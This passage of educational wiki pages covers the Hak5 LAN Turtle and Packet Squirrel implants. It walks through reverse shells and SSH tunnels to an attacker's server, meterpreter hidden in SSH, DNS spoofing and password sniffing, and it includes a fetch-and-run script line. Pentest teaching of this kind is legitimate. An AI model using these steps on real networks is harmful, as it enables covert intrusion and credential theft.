The LAN turtle comes packed with pre-installed tools. Furthermore it is possible to program your own or download them from the internet and configure them with the module manager as well.&lt;br /&gt;
&lt;br /&gt;
[[File:LANTurtleModules.jpg|400px||LAN Turtle configuration shell interface]]&lt;br /&gt;
&lt;br /&gt;
==== Manually download turtle modules ====&lt;br /&gt;
If the module manager doesn&#039;t work you need to manually download turtle modules. You can do that in the console of the lan turtle, just exit the main menu.&lt;br /&gt;
You can download modules from the [https://github.com/hak5/lanturtle-modules/tree/gh-pages/modules official hak5 github].&lt;br /&gt;
&lt;br /&gt;
# Change directory to &amp;lt;code&amp;gt;/etc/turtle/modules&amp;lt;/code&amp;gt;&lt;br /&gt;
# Download modules with &amp;lt;code&amp;gt;wget &amp;lt;link&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
# Make the file an executeable &amp;lt;code&amp;gt;chmod +x &amp;lt;file&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== AutoSSH ====&lt;br /&gt;
&lt;br /&gt;
AutoSSH is a service which provides persistent SSH connections. If an SSH session drops, it will be quickly re-established by AutoSSH. This service is typically used to provide a convenient and persistent reverse shell into the LAN Turtle on the standard SSH port 22 - though it may be configured with any standard SSH parameters to forward any arbitrary port.&lt;br /&gt;
*&amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; - The username and hostname (DNS or IP) separated by @ for which to establish the SSH connection.&lt;br /&gt;
*&amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; - The port number from which the remote server will bind.&lt;br /&gt;
*&amp;lt;code&amp;gt;listen port&amp;lt;/code&amp;gt; - The port number to which the remote port will bind.&lt;br /&gt;
&lt;br /&gt;
Example: Per the defaults, the remote server will bind its local port 2222 back to the LAN Turtle port 22. In this scenario one may establish a persistent connection to their LAN Turtle from this reverse shell by first connecting to the public server, and then from there establishing an SSH connection to port 2222.&lt;br /&gt;
&lt;br /&gt;
==== Cron ====&lt;br /&gt;
Cron is a job scheduler which can be used to start and stop modules at specific times or regular intervals using the &#039;start&#039; and &#039;stop&#039; commands.&lt;br /&gt;
&lt;br /&gt;
==== DNSSpoof ====&lt;br /&gt;
DNSSpoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks. For example, the IP address returned for a client lookup of the domain \&amp;quot;example.com\&amp;quot; can be replaced with that of the LAN Turtle itself, or a 3rd party server. In this scenario, the computer connected to the Internet through the LAN Turtle attempting to browse to this domain may be redirected to the spoofed IP.&lt;br /&gt;
&lt;br /&gt;
==== Keymanager ====&lt;br /&gt;
With this tool you can create RSA keypairs and copy them to the public server. This is needed when AutoSSH is configured.&lt;br /&gt;
&lt;br /&gt;
==== Meterpreter ====&lt;br /&gt;
This module deploys an persistent shell to the Metasploit Framework of an other Machine.&lt;br /&gt;
&lt;br /&gt;
==== Nmap-Scan ====&lt;br /&gt;
This module uses &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; for discovering running devices and their port of the current LAN network.&lt;br /&gt;
&lt;br /&gt;
==== OpenVPN ====&lt;br /&gt;
OpenVPN enables remote access the LAN Turtle and optionally the network on which it resides. It allows to send the captured data to your operating network.&lt;br /&gt;
&lt;br /&gt;
==== SSHFS====&lt;br /&gt;
SSHFS (Secure SHell FileSystem) is a file system for Linux (and other operating systems with a FUSE implementation, such as Mac OS X or FreeBSD) capable of operating on files on a remote computer using just a secure shell login on the remote computer. On the local computer where the SSHFS is mounted, the implementation makes use of the FUSE (Filesystem in Userspace) kernel module. The practical effect of this is that the end user can seamlessly interact with remote files being securely served over SSH just as if they were local files on his/her computer. On the remote computer the SFTP subsystem of SSH is used.&lt;br /&gt;
&lt;br /&gt;
==== URLSnarf ====&lt;br /&gt;
URLSnarf allows you to capture which websites were accessed by the plugged in computer. URLSnarf only works with HTTP webpages which are hard to find today.&lt;br /&gt;
&lt;br /&gt;
==== NetCat Reverse Shell ====&lt;br /&gt;
The netcat reverse shell provides you with remote access to the lan turtle and thus persistent access to the network.&lt;br /&gt;
&lt;br /&gt;
== Use Cases==&lt;br /&gt;
&lt;br /&gt;
The LAN turtle can be deployed in various use cases, which can be divided into three categories:&lt;br /&gt;
* remote access attacks with AutoSSH or OpenVPN or NetCat Reverse Shell&lt;br /&gt;
* man-in-the-middle attacks with URLSnarf or DNSSpoof&lt;br /&gt;
* information gathering with Nmap-Scan&lt;br /&gt;
&lt;br /&gt;
Remote access attacks are used to gain access to a private network from a remote place in order to start further attacks from the inside network. This makes it a lot more easier because the attack itself does not have to bypass a router or firewall. All the attacker needs is the pre-configured LAN turtle inside the network and a remote server on the internet. To perform a remote access, the LAN turtle builds up a tunnel to the remote server so the firewall cannot capture the traffic. Finally the attacker can access the LAN turtle through the tunnel from the remote server. This attack can be performed with the modules AutoSSH or OpenVPN.&lt;br /&gt;
&lt;br /&gt;
The LAN turtle also allows man-in-the-middle attacks, where the turtle can intercept the communication between two parties. To perform such an attack, the LAN turtle must be connected to an USB port of the victim host and to a network cable which connects the host to the internal LAN. Now the whole traffic of the victim host goes over the LAN turtle and can be logged or altered. An attacker can use URLSnarf or DNSSpoof to perform such an attack.&lt;br /&gt;
&lt;br /&gt;
The last use case is information gathering. The aim of this attack is to receive information about the topology, the hosts and the protocols of an internal network in order to perform further attacks. This can be done with the modules like Nmap-Scan.&lt;br /&gt;
&lt;br /&gt;
The following step-by-step instructions will outline how to configure the LAN turtle in order to perform the different types of attacks.&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with AutoSSH ===&lt;br /&gt;
In this example consider an internal network which is secured by a firewall and a public server in the internet controlled by the attacker.&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Generate RSA keypairs with Keymanager ====&lt;br /&gt;
# Open the Keymanager module and select &amp;lt;code&amp;gt;generate_key&amp;lt;/code&amp;gt;&lt;br /&gt;
# Select &amp;lt;code&amp;gt;copy_key&amp;lt;/code&amp;gt; and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; remote SSH server port (typically 22)&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; user on the remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;password&amp;lt;/code&amp;gt; password for the user on the remote host&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure AutoSSH ====&lt;br /&gt;
# Open AutoSSH and insert the following parameters:&lt;br /&gt;
#* &amp;lt;code&amp;gt;user@host&amp;lt;/code&amp;gt; user and host to establish the SSH tunnel&lt;br /&gt;
#* &amp;lt;code&amp;gt;remote port&amp;lt;/code&amp;gt; remote port to bind through the SSH tunnel (default 2222)&lt;br /&gt;
#* &amp;lt;code&amp;gt;local port&amp;lt;/code&amp;gt; local port to bind tunnel (default 22)&lt;br /&gt;
# Submit the changes and start AutoSSH (or enable it for autostart)&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Access LAN turtle from remote server ====&lt;br /&gt;
# Connect to the remote server&lt;br /&gt;
# Connect locally to the remote port of the AutoSSH configuration by &amp;lt;code&amp;gt;ssh root@localhost:2222&amp;lt;/code&amp;gt;&lt;br /&gt;
# You are now on the LAN turtle, continue with further attacks&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with NetCat Reverse Shell ===&lt;br /&gt;
==== Step 1: Start NetCat server on your host machine ====&lt;br /&gt;
* First you need to setup a netcat connection on your host machine that listens to incoming connections. To start NetCat server execute &amp;lt;code&amp;gt;nc -lvp 4444&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure NetCat Reverse Shell ====&lt;br /&gt;
# Open the NetCat Reverse Shell module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Enter your host machines ip address and the port of the nc server. In our case 4444.&lt;br /&gt;
# Start the module on the LAN Turtle.&lt;br /&gt;
&lt;br /&gt;
==== Step 3: Exploit ====&lt;br /&gt;
When the reverse shell connected to your host machine you can execute commands on the lan turtle over the reverse shell.&lt;br /&gt;
&lt;br /&gt;
=== Man-in-the-middle attacks with DNSSpoof ===&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure the spoofhost file ====&lt;br /&gt;
# Open the DNSSpoof module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Add the DNS entries that the LAN turtle should spoof by entering the IP address and the spoofed DNS name&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Place the LAN turtle in the network ====&lt;br /&gt;
After configuring the spoofed hosts, place the LAN turtle on the victim computer by simply plugging the turtle into an USB port of the computer and the network cable into the LAN turtle.&lt;br /&gt;
&lt;br /&gt;
=== Information Gathering with nmap ===&lt;br /&gt;
As an example project we use the following modules:&lt;br /&gt;
* Cron to periodically start the attack&lt;br /&gt;
* SSHFS to save the caputred information in a file on the remote server&lt;br /&gt;
* Nmap-Scan to sniff the configuration and devices of the network&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure SSHFS ====&lt;br /&gt;
# Access the SSHFS module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; IP address of the remote server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; 22&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; the username&lt;br /&gt;
#* &amp;lt;code&amp;gt;path&amp;lt;/code&amp;gt; This can be left blank if you want to use the users home directory&lt;br /&gt;
# Start SSHFS and enable it for start up&lt;br /&gt;
&lt;br /&gt;
==== Step 2: nmap-scan ====&lt;br /&gt;
# Access the nmap-scan module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* target: &amp;lt;code&amp;gt;192.168.0.1-255&amp;lt;/code&amp;gt; (This may differ for our network)&lt;br /&gt;
#* logflie: &amp;lt;code&amp;gt;/sshfs/&amp;lt;/code&amp;gt;&lt;br /&gt;
#* use the desired attack profile&lt;br /&gt;
#* save the configuration with execute&lt;br /&gt;
&lt;br /&gt;
==== Step 3: cron job ====&lt;br /&gt;
# add in the con config &amp;lt;code&amp;gt;*/15 * * * * start nmap-scan&amp;lt;/code&amp;gt;&lt;br /&gt;
This line start an nmap-scan every 15 minutes.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[LAN Turtle]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000979313-LAN-Turtle&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6089</id>
		<title>Hak5 Packet Squirrel</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6089"/>
		<updated>2021-03-05T15:45:50Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* ISpyintel */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:Packet Squirrel Connectors.jpg |thumb|right|400px||Packet Squirrel device]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel operates as an Ethernet Man in the Middle and comes  preloaded with three exploit scripts. These three attack modes are Logging Network Traffic, Spoofing DNS and OpenVPN Tunnel. These can also be modified and exchanged with other scripts. &lt;br /&gt;
The Packet Squirrel can also be combined with the [[Hak5 Cloud C2]], a command and control server specially for Hak5 devices.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
[[File:Hak5_Squirrel_version.jpg|thumb|right|400px||SSH connect]]&lt;br /&gt;
[[File:Hak5_Squirrel_spoofhost.jpg|thumb|right|400px||spoofhost file]]&lt;br /&gt;
[[File:Hak5_Squirrel_browser.jpg|thumb|right|400px||Spoofed browser warning]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel has an switch to choose between the three exploit payloads for logging the TCP dump, Using VPN Tunnelling and for DNS spoofing, or Arming Mode.&lt;br /&gt;
 &lt;br /&gt;
In &#039;&#039;&#039;Arming Mode&#039;&#039;&#039; (switch in 4th position, nearest to the USB port) you can easily access the device with ssh &amp;lt;code&amp;gt;root@172.16.32.1&amp;lt;/code&amp;gt; with the password &amp;lt;code&amp;gt;hak5squirrel&amp;lt;/code&amp;gt;. Therefore Packet Squirrel acts as DHCP server. If you don&#039;t get an IP address, manually configure an IP from the 172.16.32.0/24 network on your ethernet interface. Arming Mode is indicated by a blue blinking LED an allows to configure the different payloads.&lt;br /&gt;
&lt;br /&gt;
It is also possible to gain ssh access to the device during the attack modes with the IP address of the outgiong Ethernet interface as well.    &lt;br /&gt;
&lt;br /&gt;
==== Basic Cable Setup ====&lt;br /&gt;
&lt;br /&gt;
# Plug the victims Ethernet cable into the &amp;quot;Ethernet In&amp;quot; Port&lt;br /&gt;
# Plug the gateway Ethernet cable  into the &amp;quot;Ethernet Out&amp;quot; Port&lt;br /&gt;
# Power the device by plugging in the power cable&lt;br /&gt;
&lt;br /&gt;
==== Firmware Upgrade ====&lt;br /&gt;
&lt;br /&gt;
Shiped devices are installed with version 1.0, which can be seen in the VERSION file in the Packet Squirrel root folder. The current version 3.2 can be downloaded from the Hak5 website.&lt;br /&gt;
&lt;br /&gt;
The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS or EXT4 formatted USB drive.&lt;br /&gt;
&lt;br /&gt;
Plug in the USB drive in the Packet Squirrel and set the select switch to Arming Mode. Then power on the Packet Squirrel. &lt;br /&gt;
&lt;br /&gt;
The upgrade process needs 5 minutes and is indicated by a solid red or blue LED light. When the firmware upgrade is finished, Packet Squirrel reboots and goes in Arming Mode. Shown by a blud blinking LED. &lt;br /&gt;
&lt;br /&gt;
Then you can connect again with SSH and verify the new version, shown in Figure &amp;quot;SSH connect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Payloads ==&lt;br /&gt;
&lt;br /&gt;
=== Logging Network Traffic ===&lt;br /&gt;
&lt;br /&gt;
This mode creates TCP/UDP dumps and saves them on the USB drive to analyse later on.&lt;br /&gt;
Just follow these easy steps:&lt;br /&gt;
&lt;br /&gt;
# A USB Stick with an NTFS file system needs to be plugged in the USB-A Port before the Squirrel is Powered up. &lt;br /&gt;
# Flip the first position (which is nearest to the micro USB power in).&lt;br /&gt;
# Connect the Ethernet cable of the victim into the Ethernet port, which is at the same side as the power in USB connector and Connect the Gateway Ethernet cable to the other Port.&lt;br /&gt;
# Plug the power cable in and wait the one minute long start up sequence. The device can be either powered by the victim machine or by an USB power bank.&lt;br /&gt;
# The data traffic will be captured, if the LED starts blinking Yellow. If otherwise the LED circles between red, green and blue, then the USB stick has the wrong file system.&lt;br /&gt;
# Stop the capturing process by pressing the Button. Then the device takes some seconds to write the tcpdum to the USB Storage. As soon as the LED glows red the saving process has ended and you are good to go.&lt;br /&gt;
# You can now analyse the captured pcap file, located in \loot\tcpdump with [[Wireshark]].&lt;br /&gt;
&lt;br /&gt;
After that, the connection trough the Packet Squirrel is shut down. To allow the client to connect to the network again, Packet Squirrel has to be rebooted.&lt;br /&gt;
&lt;br /&gt;
=== DNS Spoofing Mode ===&lt;br /&gt;
&lt;br /&gt;
This mode spoofs the client with DNS entries to redirect traffic to other IP addresses.&lt;br /&gt;
&lt;br /&gt;
# For this mode we have to start in arming mode (switch at fourth position)&lt;br /&gt;
# After gaining access with ssh we change to the DNS spoofing directory with &amp;lt;code&amp;gt;cd /payloads/switch2&amp;lt;/code&amp;gt;.&lt;br /&gt;
# There we can define the Spoofed domain names by editing the file spoofhost with &amp;lt;code&amp;gt;nano spoofhost&amp;lt;/code&amp;gt;.&lt;br /&gt;
# In the file add entrys like &amp;lt;code&amp;gt;address=/myspoofdomain.at/194.232.104.140&amp;lt;/code&amp;gt; as shown in figure &amp;quot;spoofhost file&amp;quot;. The example IP belongs to orf.at&lt;br /&gt;
# Unplug the Packet Squirrel and shift the switch to the second position.&lt;br /&gt;
# Plug it in and wait until the startup sequence is finished and the LED starts blinking yellow.&lt;br /&gt;
&lt;br /&gt;
By browsing to the spoofed domain, the request gets redirected to the given IP. As shown in figure &amp;quot;Spoofed browser warning&amp;quot; browsers show certificate alerts because the domain and certificate do not match. But this mode can still be used to attack other applications which use domains with no validation.&lt;br /&gt;
&lt;br /&gt;
=== OpenVPN Mode ===&lt;br /&gt;
[[File:Packet Squirrel VPN1.jpg |thumb|right|400px||OpenVPN Access Mode]]&lt;br /&gt;
[[File:Packet Squirrel VPN2.jpg |thumb|right|400px||OpenVPN Tunneling Mode]]&lt;br /&gt;
&lt;br /&gt;
The VPN payload implements VPN access mode and VPN tunnelling mode. &lt;br /&gt;
If you want to Setup your own OpenVPN (OVPN) server follow the instructions at the [https://docs.hak5.org/hc/en-us/articles/360010554013-OpenVPN-Payload hak5 webpage]. For the purpose of testing we use use an existing server from [https://www.freeopenvpn.org/en/ freeopenvpn.org]. &lt;br /&gt;
# Start by selecting the desired server and download the the OVPN access certificate.&lt;br /&gt;
# Set the Packet Squirrel in Arming Mode and connect to its shell&lt;br /&gt;
# Copy the certificate with &amp;lt;code&amp;gt;scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn&amp;lt;/code&amp;gt;&lt;br /&gt;
# Steer to the directory with &amp;lt;code&amp;gt; cd /root/payloads/switch3/&amp;lt;/code&amp;gt;&lt;br /&gt;
# Edit the config.ovpn at line 30 to &amp;lt;code&amp;gt;auth-user-pass credentials.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
# Add an credentials file with  &amp;lt;code&amp;gt; nano credentials.txt&amp;lt;/code&amp;gt; and add the two lines:&lt;br /&gt;
## &amp;lt;code&amp;gt;freeopenvpn&amp;lt;/code&amp;gt; &lt;br /&gt;
## &amp;lt;code&amp;gt;&amp;lt;the displayed password&amp;gt;&amp;lt;/code&amp;gt; &lt;br /&gt;
# Before starting the VPN we choose the VPN mode:&lt;br /&gt;
## Open the &amp;lt;code&amp;gt;payload.sh&amp;lt;/code&amp;gt; &lt;br /&gt;
## Set the &amp;lt;code&amp;gt;For_Clients=&amp;lt;/code&amp;gt;  to&lt;br /&gt;
### &amp;lt;code&amp;gt;0&amp;lt;/code&amp;gt; for Access Mode&lt;br /&gt;
### &amp;lt;code&amp;gt;1&amp;lt;/code&amp;gt; for Tunneling Mode&lt;br /&gt;
# Now set the Switch the the third Position and plug power out and in again&lt;br /&gt;
# You are good to go, if the yellow LED starts to flash after the boot up sequence  &lt;br /&gt;
==== Access Mode ====&lt;br /&gt;
&lt;br /&gt;
Access mode allows the squirrel to access the VPN Network via the Secure Shell&lt;br /&gt;
If the connection was established if the command &amp;lt;code&amp;gt;ifconfig tun0&amp;lt;/code&amp;gt; show the following output when it is issued at the Packet Squirrels Shell.&lt;br /&gt;
 tun0 &lt;br /&gt;
      Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;br /&gt;
      inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0&lt;br /&gt;
      UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1&lt;br /&gt;
      RX packets:12 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
      TX packets:8 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
      collisions:0 txqueuelen:100&lt;br /&gt;
      RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)&lt;br /&gt;
&lt;br /&gt;
The Access Mode can be used to access an Private network that is used for testing and pen testing purposes like an honeypot virtual machine.&lt;br /&gt;
&lt;br /&gt;
==== Tunneling Mode ====&lt;br /&gt;
&lt;br /&gt;
The Tunnelling mode encapsulates all the traffic and sends it to the VPN Server, from where it is send to the internet. VPN Tunnelling allows users to disguise their IP address you can check your current IP address with [https://www.ipchicken.com ipchicken.com].&lt;br /&gt;
&lt;br /&gt;
You can also install an simple openVPN Server on a linux machine with&lt;br /&gt;
&amp;lt;code&amp;gt;wget https://git.io/vpn -O openvpn.sh &amp;amp;&amp;amp; bash openvpn.sh&amp;lt;/code&amp;gt;&lt;br /&gt;
and press Enter 6 times.&lt;br /&gt;
Then copy the generated client.ovpn file to Packet Squirrel in the /payload/switch3 folder and restart it with the switch on third position.&lt;br /&gt;
=== Meterpreter-via-SSH ===&lt;br /&gt;
This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over the tunnel.&lt;br /&gt;
The intent is to hide the meterpreter network traffic behind a legitimate SSH activity.&lt;br /&gt;
You can download this payload from the offical [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/remote-access/Meterpreter-via-SSH hak5 github].&lt;br /&gt;
==== Getting Started ====&lt;br /&gt;
Copy the playload to the Packet Squirrel into the desired switch folder. Now edit the scirpt to configure your server  options:&lt;br /&gt;
* SSH_USER - username on remote SSH server&lt;br /&gt;
* SSH_HOST - ip address of remote SSH Server&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; If you changed the default meterpreter port don&#039;t forget to change it on the metasploit side as well.&lt;br /&gt;
* MSF_PORT&lt;br /&gt;
&lt;br /&gt;
===== Generate SSH Key on Squirrel =====&lt;br /&gt;
Now you have to generate an ssh key-pair (just use default location and empty password) on your Packet Squirrel:&lt;br /&gt;
 root@squirrel:~# ssh-keygen&lt;br /&gt;
===== Allow Squirrel on SSH Server =====&lt;br /&gt;
Then you have to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH Server authorized file:&lt;br /&gt;
&lt;br /&gt;
 user@server:~# mkdir ~/.ssh&lt;br /&gt;
 user@server:~# echo &#039;paste id_rsa.pub contents inside this quote&#039; &amp;gt; ~/.ssh/authorized_keys&lt;br /&gt;
===== Run Metasploit with Resource =====&lt;br /&gt;
 msf@server:~# msfconsole -r server.rc&lt;br /&gt;
&lt;br /&gt;
==== LED Definitions ====&lt;br /&gt;
# Configure NETMODE&lt;br /&gt;
#* Solid Magenta&lt;br /&gt;
# Connect to SSH Server&lt;br /&gt;
#* SUCCESS - Blink Amber 5 Times&lt;br /&gt;
#* FAIL - Blink Red 2 Times&lt;br /&gt;
# Launch meterpreter&lt;br /&gt;
#* SUCESS - Blink Cyan 1 Time&lt;br /&gt;
#* FAIL - Blink Red 1 Time&lt;br /&gt;
&lt;br /&gt;
==== Hardening Recommendations ====&lt;br /&gt;
# Use an accout with limited privileges for SSH acces on the server.&lt;br /&gt;
# User a dedicated account for Packet Squirrel device (audit usage with SSH access logs).&lt;br /&gt;
# Disable PasswordAuthentication in sshd_config on the server.&lt;br /&gt;
&lt;br /&gt;
=== ISpyintel ===&lt;br /&gt;
This payload will automate gathering various recon data on whatever passes between it&#039;s Ethernet ports. You can download this payload from the [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/sniffing/ispyintel official hak5 github].&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; This payload requires a usb stick to store loot.&lt;br /&gt;
==== Setup ====&lt;br /&gt;
# Edit the config variables at the top. The main variables are:&lt;br /&gt;
## &amp;lt;code&amp;gt;lootPath=&amp;quot;/mnt/loot/intel&amp;quot;  # Path to loot&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;mode=&amp;quot;TRANSPARENT&amp;quot;          # Network mode we want to use&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;interface=&amp;quot;br-lan&amp;quot;          # Interface to listen on&amp;lt;/code&amp;gt;&lt;br /&gt;
# Copy payload.sh into the ~/payloads/switch folder you wish to deploy on.&lt;br /&gt;
# Connect into a target machine with access to the LAN.&lt;br /&gt;
# Set switch to the spot and power up.&lt;br /&gt;
# Leave, get coffee, take a nap while everything is recorded and parsed for future use.&lt;br /&gt;
# When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.&lt;br /&gt;
# When all is done the LED will just go blank. It is now safe to unplug and go about your day.&lt;br /&gt;
&lt;br /&gt;
==== Tasks that are started ====&lt;br /&gt;
* tcpdump - records every packet that was send and received&lt;br /&gt;
* urlsnarf - collects all websites that were visited&lt;br /&gt;
* dsniff - attempts to acquire passwords and what not&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common password fields&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common session id fields&lt;br /&gt;
* log.txt - logs the progress of the payload for troubleshooting&lt;br /&gt;
&lt;br /&gt;
==== Clean Up ====&lt;br /&gt;
Once the button is pressed the payload will automatically parse the TCPDump log file for the following items and store the results in seperate files.&lt;br /&gt;
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.&lt;br /&gt;
* ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains&lt;br /&gt;
* maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.&lt;br /&gt;
&lt;br /&gt;
=== Creating your own Payloads ===&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel allows us to create our own attack payloads by loading them to the USB stick and naming them Switch1 to Switch3.&lt;br /&gt;
It allows as to create payload in python, bash or PHP. For Python and Bash it is important to use the interpreter directive Python: &amp;lt;code&amp;gt;#!/usr/bin/python&amp;lt;/code&amp;gt;, bash: &amp;lt;code&amp;gt;#!/usr/bin/bash&amp;lt;/code&amp;gt;.&lt;br /&gt;
Bash scripts can access the following pre-installed tools:&lt;br /&gt;
openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs, tcpdump and wget&lt;br /&gt;
&lt;br /&gt;
The featured Squirrel Script offers the following additional commands:&lt;br /&gt;
&lt;br /&gt;
* NETMODE&lt;br /&gt;
specifies which network mode Packet Sqirrel uses and how traffic is routed&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Command !! Description&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE BRIDGE || Creates a bridge between the IN and OUT ehternet interface, with an own IP address for Packet Sqirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE TRANSPARENT || Also creates a bridge between the interfaces but with no own IP address&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE NAT || Packet Squirrel gets an IP address from the target network, the client gets an IP from Packet Squirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE VPN || same es NAT with VPN interface for client tunneling&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE CLONE || Clones the MAC address from the target client and uses it to connect to the LAN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* LED&lt;br /&gt;
with this command the multi-color LED can be controlled &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Possible configurations !! Description&lt;br /&gt;
|-&lt;br /&gt;
| LED Colors || red, green, blue, yellow, cyan, magenta, white&lt;br /&gt;
|-&lt;br /&gt;
| LED Patterns || SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000&lt;br /&gt;
|-&lt;br /&gt;
| LED State || SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* BUTTON&lt;br /&gt;
The BUTTON command pauses the paylpoad until the hardware button is pressed or a specified time has passed&lt;br /&gt;
&lt;br /&gt;
* SWITCH&lt;br /&gt;
The SWITCH command returns the current position of the hardware payload selection switch. Output is &amp;quot;switch1&amp;quot;, &amp;quot;switch2&amp;quot;, &amp;quot;switch3&amp;quot; or &amp;quot;switch4&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
==== Example ====&lt;br /&gt;
[[File:Hak5 C2 start.jpg |thumb|right|400px||C2 server start]]&lt;br /&gt;
[[File:Hak5 c2 dashboard.jpg |thumb|right|400px||C2 Dashboard]]&lt;br /&gt;
[[File:Hak5 c2 sqirrel.jpg |thumb|right|400px||C2 Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
Here is an example for the usage of Squirrel Script.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Title: Caternet&lt;br /&gt;
# Author: Hak5Darren&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Description: Forwards all traffic to local webserver hosting cat photos.&lt;br /&gt;
# Props: In loving memory of Hak5Kerby&lt;br /&gt;
&lt;br /&gt;
LED SETUP&lt;br /&gt;
NETMODE NAT&lt;br /&gt;
echo &amp;quot;address=/#/172.16.32.1&amp;quot; &amp;gt; /tmp/dnsmasq.address&lt;br /&gt;
/etc/init.d/dnsmasq restart&lt;br /&gt;
&lt;br /&gt;
LED ATTACK&lt;br /&gt;
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53&lt;br /&gt;
python -m SimpleHTTPServer 80&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For more information go to the [https://docs.hak5.org/hc/en-us/sections/360002180414-Payload-Development hak5.org webpage].&lt;br /&gt;
&lt;br /&gt;
== with Cloud C2 ==&lt;br /&gt;
&lt;br /&gt;
